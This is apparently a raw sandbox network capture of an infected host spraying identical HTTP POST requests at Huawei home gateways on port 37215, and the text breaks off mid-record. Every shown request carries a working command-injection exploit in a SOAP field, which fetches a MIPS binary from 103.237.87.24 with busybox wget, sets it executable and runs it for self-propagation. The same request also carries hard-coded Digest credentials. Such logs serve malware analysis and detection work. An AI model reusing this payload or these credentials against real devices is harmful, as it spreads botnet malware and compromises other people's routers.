                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1570192.168.2.1342270151.111.20.21837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.503380060 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1571192.168.2.1353986197.17.56.2337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.503381968 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1572192.168.2.1358672180.252.49.11437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.503535986 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1573192.168.2.1333686157.237.58.4037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.503587008 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1574192.168.2.135339041.220.77.16137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.503623009 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1575192.168.2.135129241.23.26.19337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.503652096 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1576192.168.2.134227483.176.20.19237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.503695965 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1577192.168.2.1351574197.227.105.13637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.503696918 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1578192.168.2.134663241.217.208.7637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.503747940 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1579192.168.2.1335274141.17.75.18937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.503791094 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 